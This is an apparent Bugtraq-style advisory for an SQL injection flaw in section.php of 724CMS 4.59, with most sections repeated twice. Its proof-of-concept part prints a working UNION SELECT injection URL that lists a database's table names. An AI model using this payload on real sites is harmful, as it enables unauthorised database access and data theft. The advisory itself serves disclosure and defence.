724CMS SQL 'section.php' SQL Injection Vulnerability
BID:40055
Info
724CMS SQL 'section.php' SQL Injection Vulnerability
| Bugtraq ID: | 40055 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 11 2010 12:00AM |
| Updated: | Aug 31 2011 07:40PM |
| Credit: | CoBRa_21 |
| Vulnerable: |
724Networks 724CMS 5.01 724Networks 724CMS 4.59 |
| Not Vulnerable: | |
Discussion
724CMS SQL 'section.php' SQL Injection Vulnerability
724Networks 724CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The issue affects 724CMS 4.59; other versions may be affected as well.
724Networks 724CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The issue affects 724CMS 4.59; other versions may be affected as well.
Exploit / POC
724CMS SQL 'section.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com//section.php?Nav=Section&ID=-1 union select 0,1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables--
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com//section.php?Nav=Section&ID=-1 union select 0,1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.tables--
Solution / Fix
724CMS SQL 'section.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
724CMS SQL 'section.php' SQL Injection Vulnerability
References:
References:
- 724CMS Eneterprise (index.php) (section.php) (RFI/Blind SQL Injection) Multiple (OuTLaWz)
- 724CMS Homepage (724Networks)